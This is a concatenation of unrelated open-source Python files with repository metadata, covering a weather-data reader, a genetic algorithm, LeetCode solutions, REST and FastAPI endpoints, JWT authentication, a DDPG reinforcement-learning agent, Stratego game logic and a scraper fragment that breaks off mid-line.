1:0:d=2011120100:APCP:surface:0-1 hour acc fcst: 2:94325:d=2011120100:APCP:surface:1-2 hour acc fcst: 3:193206:d=2011120100:APCP:surface:2-3 hour acc fcst: 4:309596:d=2011120100:APCP:surface:3-4 hour acc fcst: 5:421187:d=2011120100:APCP:surface:4-5 hour acc fcst: 6:537704:d=2011120100:APCP:surface:5-6 hour acc fcst: To get the 6 hourly accumulation, all 6 of these need to be added. Then take the mean (e.g., divide by 6h) to get mm/h. """ dt_beginning = dt_ending - dt.timedelta(hours=6) if dt_beginning < dt.datetime(2011,3,31,23,59,0): fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y') + '/apcp.gdas.' + dt_beginning.strftime('%Y%m') + '.grb2') else: fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y') + '/apcp.cdas1.' + dt_beginning.strftime('%Y%m') + '.grb2') if verbose: print(fn_beginning, flush=True) rec_num = 1 + int((dt_beginning - dt.datetime(dt_beginning.year, dt_beginning.month,1,0,0,0)).total_seconds()/3600.0) F = read_cfsr_grib2(fn_beginning, band_list=range(rec_num,rec_num+6,1), verbose=verbose) precip6hr = np.nanmean(F['precip'], axis=1)[0] DATA={} DATA['lon'] = F['lon'] DATA['lat'] = F['lat'] DATA['precip'] = precip6hr return DATA
brandonwkerns/lpt-python-public
lpt/readdata.py
readdata.py
py
19,320
python
en
code
3
github-code
6
37559032301
import numpy as np def fitness(f, x): """ Supplied function f(x) returns a value for fitness so long as f(x) has a range >= 0 :param f: :param x: :return: """ # return np.exp(f(x)) # e^y made table unreadable from extremely small numbers # return f(x) if (int(x,2) > 0 and int(x,2) < 15) else 1 return f(x) if f(x) > 0 else 1 def generate_population(size): pop = ['{0:04b}'.format(i) for i in range(size)] return pop def choose(population, size, relative=None): if relative is None: return np.random.choice(population, size) return np.random.choice(population, relative, size) def choose_parents(group, relative): x1, x2 = np.random.choice(a=group, p=relative, size=2) return x1, x2 def crossover(a, b): pivot = np.random.randint(0, max(len(a), len(b)), size=1)[0] c1 = a[0:pivot] + b[pivot:len(b)] c2 = b[0:pivot] + a[pivot:len(a)] return c1, c2 def mutate(child): pivot = np.random.randint(0, len(child)) if child[pivot] == '0': r = '1' else: r = '0' child = child[:pivot] + r + child[pivot+1:] return child def ga(func, pop_size=15, elite_size=6, generations=500, pc=0.7, pm=0.1): mostfit = -1 fitnesses = None relative = None avgfits = [] population = generate_population (pop_size) for epoch in range(1, generations): print("===========================") print("Generation", epoch) print("---------------------------") elites = choose(population, elite_size) while elites.size < pop_size: fitnesses = [fitness(func, elite) for elite in elites] relative = [(x/sum(fitnesses)) for x in fitnesses] x1, x2 = choose(elites, relative, 2) if np.random.random() <= pc: c1, c2 = crossover(x1, x2) if np.random.random() <= pm: c1 = mutate(c1) fitnesses.append(fitness(func, c1)) elites = np.append(elites, c1) if np.random.random() <= pm: c2 = mutate(c2) fitnesses.append(fitness(func, c1)) elites = np.append(elites, c2) avgfits.append(np.mean(fitnesses)) population = elites print("Average Fitness:", np.around(np.mean(fitnesses), decimals=3)) print("{:>2}{:>10}{:>10}{:>15}{:>15}".format("N", "bin", "int", "fitness", "relative")) for i in range(len(elites)): print("{:>2}{:>10}{:>10}{:>15.4g}{:>15.2g}".format( i, elites[i], int(elites[i], 2), np.around(fitness(func, elites[i]), decimals=4), fitnesses[i]/sum(fitnesses))) print("===========================") return population, avgfits
shottah/expert-systems
assignment-3/GA.py
GA.py
py
2,807
python
en
code
0
github-code
6
5454371991
""" Problem: 1. Two Sum Difficulty: Easy URL: https://leetcode.com/problems/two-sum Tags: Array, Hash Table Date: 2022-05-10T14:00:29.877163+08:00 """ from typing import List class Solution: def twoSum(self, nums: List[int], target: int) -> List[int]: for i, num in enumerate(nums): if target - num in nums[i + 1:]: return [i, nums.index(target - num, i + 1)] tests = [ ( ([2, 7, 11, 15], 9, ), [0, 1], ), ( ([3, 2, 4], 6, ), [1, 2], ), ( ([3, 3], 6, ), [0, 1], ), ]
s0u0b/leetcode
solutions/a00001_two_sum.py
a00001_two_sum.py
py
630
python
en
code
0
github-code
6
43954128076
import json import requests # see http://python-requests.org def url_for(endpoint): return 'http://localhost:5000/{}/'.format(endpoint) def delete_all_people(): r = requests.delete(url_for('people')) print("'people' deleted, server response:", r.status_code) def post_people(): data = [ {'firstname': 'John', 'lastname': 'Doe'}, {'firstname': 'Mike', 'lastname': 'Green'}, ] response = requests.post( url_for('people'), json.dumps(data), headers={'Content-Type': 'application/json'} ) print("'people' posted, server response:", response.status_code) def get_people(): r = requests.get(url_for('people')) print('people downloaded, server response:', r.status_code) if r.status_code == 200: people = r.json()['_items'] print('{} people:'.format(len(people))) for person in people: print('{}, {}'.format(person['firstname'], person['_id'])) def main(): delete_all_people() post_people() get_people() if __name__ == '__main__': main()
talkpython/eve-building-restful-mongodb-backed-apis-course
code/clients/client.py
client.py
py
1,081
python
en
code
62
github-code
6
11250773237
import connexion from openapi_server import orm from openapi_server.db import db from openapi_server.models.error import Error # noqa: E501 from openapi_server.models.qc_result import QcResult # noqa: E501 def samples_id_qc_result_delete(id): # noqa: E501 """samples_id_qc_result_delete Delete the QC result associated with a sample with {id}. # noqa: E501 :param id: :type id: str :rtype: None """ sample = orm.Sample.query.get(id) if not sample or not sample.qc_result: return Error(404, 'Not found'), 404 db.session.delete(sample.qc_result) db.session.commit() return '', 204 def samples_id_qc_result_get(id): # noqa: E501 """samples_id_qc_result_get Return the QC result associated with a sample. # noqa: E501 :param id: :type id: str :rtype: QcResult """ sample = orm.Sample.query.get(id) if not sample or not sample.qc_result: return Error(404, 'Not found'), 404 return sample.qc_result.to_model(), 200 def samples_id_qc_result_put(id, qc_result=None): # noqa: E501 """samples_id_qc_result_put Add or replace new QC result associated with a sample. # noqa: E501 :param id: :type id: str :param qc_result: QC result to be added :type qc_result: dict | bytes :rtype: QcResult """ if connexion.request.is_json: qc_result = QcResult.from_dict(connexion.request.get_json()) # noqa: E501 sample = orm.Sample.query.get(id) if not sample: return Error(404, 'Not found'), 404 inst = orm.QcResult.from_model(qc_result) inst.sample_id = sample.id if sample.qc_result: sample.qc_result = inst else: db.session.add(inst) db.session.commit() return inst.to_model(), 200, {'location': ''}
Mykrobe-tools/mykrobe-atlas-tracking-api
openapi_server/controllers/qc_result_controller.py
qc_result_controller.py
py
1,810
python
en
code
0
github-code
6
75051529788
import logging import random from typing import Set, Generator, Optional from .location import Location from .move import Move from .piece import Color, Piece, Rank from .board import Board class MoveSet: _brd = None # type: Board @staticmethod def set_board(brd: Board) -> None: r""" Sets the board for the entire class """ MoveSet._brd = brd r""" Moves available to a player """ def __init__(self, color: Color): r""" :param color: Color that is making the moves """ self._avail = dict() # Available moves self._color = color @property def avail(self) -> dict: r""" Accessor for the available moves """ return self._avail @staticmethod def build(pieces: Set[Piece], locs: dict, other_locs: dict) -> 'MoveSet': r""" Factory method used to construct an initial move set. :param pieces: All of the players pieces :param locs: Location of the player pieces :param other_locs: Location of pieces of other player :return: Constructed move set """ assert MoveSet._brd is not None, "Board information be present" assert pieces, "Piece set can never be empty" color = next(iter(pieces)).color ms = MoveSet(color) for p in pieces: ms.add_piece(p, locs, other_locs) return ms def add_piece(self, piece: Piece, locs: dict, other_locs: dict): r""" Add a piece's moves to the MoveSet :param piece: Piece whose moves (if any) will be added :param locs: Location of the player pieces :param other_locs: Location of pieces of other player """ self._process_piece(piece, locs, other_locs, add=True) def del_piece(self, piece: Piece, locs: dict, other_locs: dict): r""" Add a piece's moves to the MoveSet :param piece: Piece whose moves (if any) will be added :param locs: Location of the player pieces :param other_locs: Location of pieces of other player """ self._process_piece(piece, locs, other_locs, add=False) def _process_piece(self, piece: Piece, locs: dict, other_locs: dict, add: bool): r""" Standardizes adding/removing a piece since same algorithm with minor change. :param piece: Piece to process :param locs: Location for pieces of same color as \p Piece :param other_locs: Location for other player's pieces :param add: If True, add the piece, otherwise remove the piece """ # Verify color is same for all pieces assert piece.color == self._color, "Piece set has pieces of different colors" # Standard function for either adding or deleting a move def _process_func(_p: Piece, _loc: Location): if add: try: self._add_move(_p, _loc, other_locs[_loc]) except KeyError: self._add_move(_p, _loc) else: self._del_move(_p, _loc) # Bombs and flags can be ignored if piece.is_immobile(): return # Check ordinary pieces if piece.rank != Rank.scout(): for loc in piece.loc.neighbors(): # Ignore pieces not allowed by board or where piece of same color if not self._brd.is_inside(loc) or loc in locs: continue _process_func(piece, loc) # Check scout pieces specially else: for direction_list in self._brd.to_edge_lists(piece.loc): for loc in direction_list: # If scout blocked by board location or same color, immediately stop if not self._brd.is_inside(loc) or loc in locs: break _process_func(piece, loc) if loc in other_locs: break def _add_move(self, p: Piece, other: Location, attacked: Optional[Piece] = None) -> None: r""" Add \p piece's move to \p other to the \p MoveSet """ assert p.is_scout() or p.loc.is_adjacent(other) key = self._make_move_key(p.loc, other) # assert key not in self._avail self._avail[key] = Move(p, p.loc, other, attacked) def _del_move(self, p: Piece, other: Location) -> None: r""" Delete the corresponding move from the \p MoveSet :param p: Piece whose move will be deleted :param other: Location where \p p will be moved """ assert p.is_scout() or p.loc.is_adjacent(other) key = self._make_move_key(p.loc, other) del self._avail[key] def has_move(self, p: Piece, new_loc: Location) -> bool: r""" Returns True if the \p Piece has an availble move to the specified \p Location """ key = self._make_move_key(p.loc, new_loc) return key in self._avail def get_move(self, p: Piece, new_loc: Location) -> Optional[Move]: r""" Gets the move corresponding to the \p Piece and \p Location. If the corresponding \p Move is not found, \p None is returned. """ key = self._make_move_key(p.loc, new_loc) try: return self._avail[key] except KeyError: return None def __len__(self) -> int: r""" Return number of moves in the \p MoveSet """ return len(self._avail) def __contains__(self, item: Move) -> bool: r""" Adds support for the "in" operator """ if item.piece is None: return False return self.has_move(item.piece, item.new) def remove_moves_after_add(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None: r""" Process the adding of a piece at Location \p loc :param loc: Location of added piece :param plyr_locs: Location of pieces for same color as \p MoveSet :param other_locs: Location of pieces of other \p Player """ self._handle_loc_change(loc, plyr_locs, other_locs, False) def add_moves_after_delete(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None: r""" Process the deletion of a piece that was at Location \p loc :param loc: Location of deleted piece :param plyr_locs: Location of pieces for same color as \p MoveSet :param other_locs: Location of pieces of other \p Player """ self._handle_loc_change(loc, plyr_locs, other_locs, True) def _handle_loc_change(self, loc: Location, plyr_locs: dict, other_locs: dict, add: bool): r""" Process a \p Location's state change by either removing or add moves to the MoveSet. :param loc: Location whose state is being changed :param plyr_locs: Locations of the implicit player's pieces :param other_locs: Location dictionary for the other player :param add: If True, add moves to the MoveSet. Otherwise, remove those locations. """ el = self._brd.to_edge_lists(loc) el_groups = [(el.right, el.left), (el.left, el.right), (el.up, el.down), (el.down, el.up)] def _add_func(_p: Piece, _loc: Location): try: self._add_move(_p, _loc, other_locs[_loc]) except KeyError: self._add_move(_p, _loc) for search, opp in el_groups: # Find first piece in search direction (if any) p = None for srch in search: if srch in plyr_locs: p = plyr_locs[srch] elif srch in other_locs: p = other_locs[srch] if p is not None: break # If no piece in search direction if p is None or p.is_immobile(): continue # Ignore pieces of other color since will be handled in separate function call if p.color != self._color: continue # If found p is not a scout and not adjacent, move on if not p.is_scout() and not p.loc.is_adjacent(loc): continue # Delete first since may need to add in next step if not add: self._del_move(p, loc) # In an add, always add the move. In a delete, may need to add back if the moved # piece is of the other player's color if add or loc in other_locs: _add_func(p, loc) if p.is_scout(): for srch in opp: if srch in plyr_locs: break if add: _add_func(p, srch) else: self._del_move(p, srch) # Perform second since could still attack if srch in other_locs: break @staticmethod def _make_move_key(orig: Location, new: Location): return orig, new def is_empty(self, cyclic_moves: Set[Move] = None) -> bool: r""" Returns \p True if the \p MoveSet is empty """ if cyclic_moves is not None and cyclic_moves: avail = set(self.avail.values()) # If available larger than cyclic, definitely not empty move set if len(avail) > len(cyclic_moves): return False # Check if each available moves in cyclic. If any not in there, not empty move set for a_m in avail: for c_m in cyclic_moves: if Move.is_identical(a_m, c_m): break else: return False return True return not bool(self.avail) def __iter__(self): return iter(self.avail.values()) class Player: r""" Represents one of the two players """ def __init__(self, color: Color): r""" :param color: Color of the player """ self._color = color # noinspection PyTypeChecker self._move_set = None # type: MoveSet self._locs = dict() self._pieces = set() @property def color(self) -> Color: r""" Accessor for the \p Player's \p Color. """ return self._color @property def num_pieces(self) -> int: r""" Accessor for number of pieces the player has """ return len(self._pieces) @property def move_set(self) -> MoveSet: r""" Accessor for the \p Player's \p MoveSet""" return self._move_set def add_piece(self, piece: Piece, other: 'Player' = None) -> None: r""" Add \p piece to \p Player's set of pieces """ assert piece not in self._pieces, "Duplicate piece" assert piece.loc not in self._locs, "Two pieces in same location" self._pieces.add(piece) self._locs[piece.loc] = piece if other is not None: assert self._color != other.color self.move_set.add_piece(piece, self._locs, other._locs) def delete_piece_info(self, piece: Piece, other: 'Player') -> None: r""" Remove \p piece from the \p Player's set of pieces """ self._pieces.remove(piece) del self._locs[piece.loc] self.move_set.del_piece(piece, self._locs, other._locs) def delete_moveset_info(self, loc: Location, other: 'Player') -> None: r""" Update the MoveSet information after deleting a piece at Location \p loc """ assert self._color != other.color self.move_set.add_moves_after_delete(loc, self._locs, other._locs) def update_moveset_after_add(self, loc: Location, other: 'Player') -> None: r""" When adding a piece (i.e., moving it and placing it back down), some previously valid moves become blocked. This method updates \p MoveSet to accomodate that. :param loc: \p Location where piece was placed :param other: Other player """ assert self._color != other.color # pylint: disable=protected-access self.move_set.remove_moves_after_add(loc, self._locs, other._locs) def has_flag(self) -> bool: r""" Returns True if the player has a flag """ flag = Rank.flag() return any(p.rank == flag for p in self._pieces) def get_piece_at_loc(self, loc: Location) -> Optional[Piece]: r""" Returns the piece at the specified location. If no piece is there, returns None """ try: return self._locs[loc] except KeyError: return None def has_move(self, piece: Piece, new_loc: Location) -> bool: r""" Returns \p True if the player has a move for the piece ot the specified \p Location """ assert piece is not None return self.move_set.has_move(piece, new_loc) def is_valid_next(self, m: Move) -> bool: r""" Checks whether move \m is in the player's \p MoveSet :param m: \p Move to check :return: True if \p m is a valid next move. """ return m in self.move_set def get_move(self, piece: Piece, new_loc: Location) -> Optional[Move]: r""" Returns \p True if the player has a move for the piece ot the specified \p Location """ assert piece is not None return self.move_set.get_move(piece, new_loc) def piece_locations(self) -> Set[Location]: r""" Location of all of the \p Player's pieces """ set_locs = set(self._locs.keys()) assert len(set_locs) == len(self._pieces) return set_locs def pieces(self) -> Generator[Piece, None, None]: r""" Generator that yields the Player's pieces """ for p in self._pieces: yield p def build_move_set(self, other: 'Player'): r""" Construct the move set of the """ assert self._color != other.color self._move_set = MoveSet.build(self._pieces, self._locs, other._locs) def verify_piece_set(self, piece_set: Board.PieceSet) -> bool: r""" Verify that the player piece information is compliance with the \p Board \p PieceSet :param piece_set: Piece set maximum counts :return: True if the player's piece set information is in compliance """ pieces_by_rank = dict() # Count the number of pieces for each rank for p in self._pieces: try: pieces_by_rank[p.rank] += 1 except KeyError: pieces_by_rank[p.rank] = 1 res = True for r in Rank.get_all(): if r in pieces_by_rank and pieces_by_rank[r] > piece_set.get_rank_count(r): logging.warning("Color %s has too many pieces of rank: \"%s\"", self._color.name, r) res = False return res def get_random_move(self) -> Move: r""" Selects a piece to move uniformly at random. Then select the move from that piece's available moves uniformly at random. :return: Randomly selected move """ move_dict = dict() keys = [] for m in self.move_set.avail.values(): try: move_dict[m.piece].append(m) except KeyError: keys.append(m.piece) move_dict[m.piece] = [m] key = random.choice(keys) return random.choice(move_dict[key])
ZaydH/stratego
src/stratego/player.py
player.py
py
14,932
python
en
code
0
github-code
6
21276696396
import mindspore from mindspore import Tensor, nn from mindspore.common.initializer import Uniform, VarianceScaling from mindspore.ops import composite as C from mindspore.ops import operations as P from mindspore_rl.agent.actor import Actor from mindspore_rl.agent.learner import Learner from mindspore_rl.utils import OUNoise, SoftUpdate class HuberLoss(nn.Cell): """Huber Loss""" def __init__(self, delta=1.0): super().__init__() self.delta = Tensor(delta, mindspore.float32) self.abs = P.Abs() self.square = P.Square() self.select = P.Select() self.reduce_sum = P.ReduceSum() def construct(self, predict, label): abs_error = self.abs(predict - label) cond = abs_error <= self.delta loss = self.select( cond, 0.5 * self.square(abs_error), self.delta * abs_error - 0.5 * self.square(self.delta), ) return self.reduce_sum(loss) class DDPGPolicy: """This is DDPGPolicy class. You should define your networks (DDPGActorNet and DDPGCriticNet here) which you prepare to use in the algorithm. Moreover, you should also define you loss function (DDPGLossCell here) which calculates the loss between policy and your ground truth value. """ class DDPGActorNet(nn.Cell): """DDPGActorNet is the actor network of DDPG algorithm. It takes a set of state as input and outputs miu, sigma of a normal distribution""" def __init__( self, input_size, hidden_size1, hidden_size2, output_size, compute_type=mindspore.float32, ): super(DDPGPolicy.DDPGActorNet, self).__init__() weight_init = VarianceScaling( scale=1.0 / 3, mode="fan_in", distribution="uniform" ) self.dense1 = nn.Dense( input_size, hidden_size1, weight_init=weight_init ).to_float(compute_type) self.dense2 = nn.Dense( hidden_size1, hidden_size2, weight_init=weight_init ).to_float(compute_type) last_weight_init = Uniform(scale=0.003) self.dense3 = nn.Dense( hidden_size2, output_size, weight_init=last_weight_init ).to_float(compute_type) self.tanh = P.Tanh() self.relu = P.ReLU() def construct(self, x): """calculate""" x = self.relu(self.dense1(x)) x = self.relu(self.dense2(x)) x = self.tanh(self.dense3(x)) return x class DDPGCriticNet(nn.Cell): """DDPGCriticNet is the critic network of DDPG algorithm. It takes a set of states as input and outputs the value of input state""" def __init__( self, obs_size, action_size, hidden_size1, hidden_size2, output_size, compute_type=mindspore.float32, ): super(DDPGPolicy.DDPGCriticNet, self).__init__() weight_init = VarianceScaling( scale=1.0 / 3, mode="fan_in", distribution="uniform" ) self.dense1 = nn.Dense( obs_size, hidden_size1, weight_init=weight_init ).to_float(compute_type) self.dense2 = nn.Dense( hidden_size1 + action_size, hidden_size2, weight_init=weight_init ).to_float(compute_type) last_weight_init = Uniform(scale=0.003) self.dense3 = nn.Dense( hidden_size2, output_size, weight_init=last_weight_init ).to_float(compute_type) self.concat = P.Concat(axis=-1) self.relu = P.ReLU() self.cast = P.Cast() def construct(self, observation, action): """predict value""" x = self.relu(self.dense1(observation)) action = self.cast(action, x.dtype) x = self.concat((x, action)) x = self.relu(self.dense2(x)) x = self.dense3(x) return x def __init__(self, params): # nn.Cell do not support clone or deepcopy. Create target network manually. self.actor_net = self.DDPGActorNet( params["state_space_dim"], params["hidden_size1"], params["hidden_size2"], params["action_space_dim"], params["compute_type"], ) self.target_actor_net = self.DDPGActorNet( params["state_space_dim"], params["hidden_size1"], params["hidden_size2"], params["action_space_dim"], params["compute_type"], ) self.critic_net = self.DDPGCriticNet( params["state_space_dim"], params["action_space_dim"], params["hidden_size1"], params["hidden_size2"], 1, params["compute_type"], ) self.target_critic_net = self.DDPGCriticNet( params["state_space_dim"], params["action_space_dim"], params["hidden_size1"], params["hidden_size2"], 1, params["compute_type"], ) class DDPGActor(Actor): """This is an actor class of DDPG algorithm, which is used to interact with environment, and generate/insert experience (data)""" def __init__(self, params=None): super().__init__() self.actor_net = params["actor_net"] self.env = params["collect_environment"] self.expand_dims = P.ExpandDims() self.squeeze = P.Squeeze() low, high = self.env.action_space.boundary self.clip_value_min = Tensor(low) self.clip_value_max = Tensor(high) self.noise = OUNoise( params["stddev"], params["damping"], self.env.action_space.shape ) def act(self, phase, params): """collect experience and insert to replay buffer (used during training)""" actions = self.get_action(phase, params) next_obs, rewards, done = self.env.step(actions) rewards = self.expand_dims(rewards, 0) done = self.expand_dims(done, 0) return next_obs, actions, rewards, done def get_action(self, phase, params): """get action""" obs = self.expand_dims(params, 0) actions = self.actor_net(obs) actions = self.squeeze(actions) if phase != 3: actions = self.noise(actions) actions = C.clip_by_value(actions, self.clip_value_min, self.clip_value_max) return actions class DDPGLearner(Learner): """This is the learner class of DDPG algorithm, which is used to update the policy net""" class CriticLossCell(nn.Cell): """DDPGLossCell calculates the loss of DDPG algorithm""" def __init__(self, gamma, target_actor_net, target_critic_net, critic_net): super(DDPGLearner.CriticLossCell, self).__init__(auto_prefix=True) self.gamma = gamma self.target_actor_net = target_actor_net self.target_critic_net = target_critic_net self.critic_net = critic_net self.huber_loss = HuberLoss() def construct(self, obs, actions, rewards, next_obs, done): """calculate the total loss""" # critic Loss target_actions = self.target_actor_net(next_obs) target_q_values = self.target_critic_net(next_obs, target_actions) # One step td error. td_targets = rewards + self.gamma * (1.0 - done) * target_q_values q_values = self.critic_net(obs, actions) critic_loss = self.huber_loss(td_targets, q_values) return critic_loss class ActorLossCell(nn.Cell): """ActorLossCell calculates the loss of DDPG algorithm""" def __init__(self, actor_net, critic_net): super(DDPGLearner.ActorLossCell, self).__init__(auto_prefix=True) self.actor_net = actor_net self.critic_net = critic_net self.reduce_mean = P.ReduceMean() def construct(self, obs): """calculate the total loss""" actions = self.actor_net(obs) q_values = self.critic_net(obs, actions) actor_loss = -self.reduce_mean(q_values) return actor_loss def __init__(self, params): super().__init__() gamma = params["gamma"] self.critic_net = params["critic_net"] self.actor_net = params["actor_net"] # optimizer network critic_optimizer = nn.Adam( self.critic_net.trainable_params(), learning_rate=params["critic_lr"] ) actor_optimizer = nn.Adam( self.actor_net.trainable_params(), learning_rate=params["actor_lr"] ) # loss network self.target_actor_net = params["target_actor_net"] self.target_critic_net = params["target_critic_net"] critic_loss_cell = self.CriticLossCell( gamma, self.target_actor_net, self.target_critic_net, self.critic_net ) critic_loss_cell = self.CriticLossCell( gamma, self.target_actor_net, self.target_critic_net, self.critic_net ) actor_loss_cell = self.ActorLossCell(self.actor_net, self.critic_net) self.critic_train = nn.TrainOneStepCell(critic_loss_cell, critic_optimizer) self.actor_train = nn.TrainOneStepCell(actor_loss_cell, actor_optimizer) self.critic_train.set_train(mode=True) self.actor_train.set_train(mode=True) # soft update network factor, interval = params["update_factor"], params["update_interval"] params = self.actor_net.trainable_params() + self.critic_net.trainable_params() target_params = ( self.target_actor_net.trainable_params() + self.target_critic_net.trainable_params() ) self.soft_updater = SoftUpdate(factor, interval, params, target_params) def learn(self, experience): """DDPG learners""" obs, actions, rewards, next_obs, done = experience critic_loss = self.critic_train(obs, actions, rewards, next_obs, done) actor_loss = self.actor_train(obs) # update target network parameters. self.soft_updater() return critic_loss + actor_loss
mindspore-lab/mindrl
mindspore_rl/algorithm/ddpg/ddpg.py
ddpg.py
py
10,399
python
en
code
21
github-code
6
21394429670
import numpy as np import statistics from scipy import stats dataset= [5,6,7,5,6,5,7,4,5,5,5,5,7,5,6,6,7,6,6,7,7,7,6,5,6] #mean value mean= np.mean(dataset) #median value median = np.median(dataset) #mode value mode= stats.mode(dataset) #standard Deviation Std = statistics.stdev(dataset) #Variance Var = statistics.variance(dataset) print("Mean: ", mean) print("Median: ", median) print("Mode: ", mode) print("Std", Std) print("Var", Var)
lamyanlok/FTDS
test.py
test.py
py
447
python
en
code
0
github-code
6
4552178157
# Busca Local Múltiplos Inicios # Local Search Multiple Starts import sys import time sys.path.insert(1, '../stage_01') sys.path.insert(1, '../') from utils import corrent_solution_size, objetive_function, read_instance, viable_solution from local_search import local_search from semi_greedy import semi_greedy import config # Busca local múltiplos inícios + semi-guloso alpha + busca local primeira melhora def multiple_starts_local_search(alpha, timeout): desks, tests, empty = config.desks, config.tests, config.empty desk_count = len(desks) test_count = len(tests) s_ = viable_solution(desk_count, desk_count, test_count) value_ = objetive_function(s_) initial_time = time.time() current_time = time.time() execution_time = current_time - initial_time while execution_time < timeout: s, _ = semi_greedy(alpha, False) s, value = local_search(s, 0, False) # 1 = Primeira melhora if value < value_: s_ = s value_ = value current_time = time.time() execution_time = current_time - initial_time s_, value_ = corrent_solution_size(s_, empty) return s_, value_ if __name__ == '__main__': file_name = sys.argv[1] timeout = int(sys.argv[2]) alpha = float(sys.argv[3]) config.set_timeout(timeout) read_instance(file_name) s_, value_ = multiple_starts_local_search(alpha, timeout) print(s_) print(value_)
guilhermelange/Test-Assignment-Problem
stage_02/multiple_starts_local_search_02.py
multiple_starts_local_search_02.py
py
1,452
python
en
code
0
github-code
6
35007890164
from src.main.python.Solution import Solution from src.main.python.datastructures.Interval import Interval # Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary). # # You may assume that the intervals were initially sorted according to their start times. # # Example 1: # Given intervals [1,3],[6,9], insert and merge [2,5] in as [1,5],[6,9]. # # Example 2: # Given [1,2],[3,5],[6,7],[8,10],[12,16], insert and merge [4,9] in as [1,2],[3,10],[12,16]. # # This is because the new interval [4,9] overlaps with [3,5],[6,7],[8,10]. class Q057(Solution): def insert(self, intervals, newInterval): """ :type intervals: List[Interval] :type newInterval: Interval :rtype: List[Interval] """ ans = [] if newInterval: copy = newInterval for interval in intervals: if copy.start <= interval.end and interval.start <= copy.end: copy.start = min(copy.start, interval.start) copy.end = max(copy.end, interval.end) elif copy.end < interval.start: ans.append(copy) copy = interval else: ans.append(interval) ans.append(copy) return ans
renkeji/leetcode
python/src/main/python/Q057.py
Q057.py
py
1,332
python
en
code
0
github-code
6
72438613309
from fastapi import APIRouter, Body, Depends, Request, status from fastapi.responses import JSONResponse from jarvis.db.database import DataBase, get_database from jarvis.core import config, utils from jarvis.lib import TwilioHelper from typing import Dict from twilio.rest import Client import jarvis.crud as crud import jarvis.models as model import jarvis.core.text_responses as text router = APIRouter() twilio_helper = TwilioHelper() client = Client(config.TWILIO_ACCOUNT_SID, config.TWILIO_ACCOUNT_AUTH_TOKEN) @router.post("/add") async def add_item_to_cart(request: Request, db: DataBase = Depends(get_database)): async with db.pool.acquire() as conn: body = await request.form() parsed_body = dict(body) cart_item = model.CartItem(**parsed_body) normalized_cart_item = await utils.normalize_cart_item_model(conn, cart_item) cart_item_name = normalized_cart_item.get("name") item_quantity = normalized_cart_item.get("quantity") success_message = text.add_item_success(cart_item_name, item_quantity) shopping_cart_message = text.shopping_cart_info(1) msg = "".join([success_message, shopping_cart_message]) return twilio_helper.compose_mesage(msg) # Make potentially a new helper class that has add item # because you have to then convert this to a message after etc # shopping_cart = model.ShoppingCart(**payload) # return None @router.get("/menu/{item_type}") async def get_menu( item_type: str, db: DataBase = Depends(get_database), ): async with db.pool.acquire() as conn: try: items = await crud.get_all_item_by_type(conn, item_type) message_list = [utils.item_model_to_message(item) for item in items] message = "\n".join(message_list) twilio_message = twilio_helper.compose_mesage(message) return twilio_message except UserWarning as warning: return JSONResponse( status_code=status.HTTP_202_ACCEPTED, content=str(warning) ) @router.post("/checkout") async def checkout_cart( payload: Dict = Body(...), db: DataBase = Depends(get_database) ): pass @router.post("/sms") async def get_twilio_text(): resp = ":)" return utils.create_text_response(resp) @router.get("/test") async def twilio_test(payload: Dict = Body(...)): message = client.messages.create( body="Jarvis test", messaging_service_sid=config.TWILIO_ACCOUNT_MESSAGING_SID, to=config.TO_PHONE_NUMBER, ) return message.sid
christian-miljkovic/jarvis
jarvis/api/v1/user_endpoint.py
user_endpoint.py
py
2,604
python
en
code
0
github-code
6
26420619240
from datetime import timedelta, datetime from typing import Optional from fastapi import Depends, HTTPException, status from fastapi.security import OAuth2PasswordBearer from sqlalchemy.orm import Session from jose import jwt, JWTError from app import database, models from app.schemas import TokenData from app.config import settings oauth2_scheme = OAuth2PasswordBearer(tokenUrl="login") SECRET_KEY = settings.secret_key ALGORITHM = settings.algorithm ACCESS_TOKEN_EXPIRE_MINUTES = settings.access_token_expire_minutes def create_access_token(data: dict, expires_delta: Optional[timedelta] = None): to_encode = data.copy() if expires_delta: expire = datetime.utcnow() + expires_delta else: expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES) to_encode.update({"exp": expire}) encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) return encoded_jwt def verify_access_token(token: str, credentials_exception): try: payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) user_id: str = payload.get("user_id") if user_id is None: raise credentials_exception token_data = TokenData(id=user_id) except JWTError: raise credentials_exception return token_data def get_current_user( token: str = Depends(oauth2_scheme), db: Session = Depends(database.get_db) ): credentials_exception = HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail="Could not validate credentials", headers={"WWW-Authenticate": "Bearer"}, ) token = verify_access_token(token, credentials_exception) user = db.query(models.User).filter(models.User.id == token.id).first() return user
AdityaPunetha/FastAPI-Full-Devlopment
app/oauth2.py
oauth2.py
py
1,771
python
en
code
2
github-code
6
8950963065
import requests from bs4 import BeautifulSoup import pandas as pd from os import listdir, remove import datetime as dt from time import sleep from MainMethods import getInfo, showDays from conf import INT, INF, URL, LOC, NINF, LOC2,\ chosenF, errorsF, doneF """ The information for saved days is checked and old files deleted. """ oldflags = [f for f in listdir(LOC2) if f[0]== "F"] if oldflags: for f in oldflags: remove(f"{LOC2}\{f}") saved= listdir(LOC) if saved: saved = [f.split(".csv")[0] for f in saved] ints = [int(f.split("y")[-1]) for f in saved] for i, f in enumerate(saved): if ints[i] < dt.datetime.today().day and max(ints) -ints[i] <9: remove(f"{LOC}\{f}.csv") saved.remove(f) def flagIt(): now = dt.datetime.timestamp(dt.datetime.now()) name = fr"{LOC2}\F{str(int(now))}.txt" with open(name, "w") as F: pass sleep(2) return name def unflagIt(name): remove(name) def checkWait(): flag = [f for f in listdir(LOC2) if f[0] == "T"] if flag: while flag[0] in listdir(LOC2): print("Wait, Sign Up in process....") sleep(5) checkWait() flag = flagIt() Chosen = pd.read_csv(chosenF) Done = pd.read_csv(doneF)[NINF[-2]].to_list() if Done: print(f"These SignUps are done and should be confirmed by email:\n" f"{Chosen[Chosen[NINF[-2]].isin(Done)][[NINF[0], NINF[1], NINF[2]]].to_string(index=False)}\n\n" 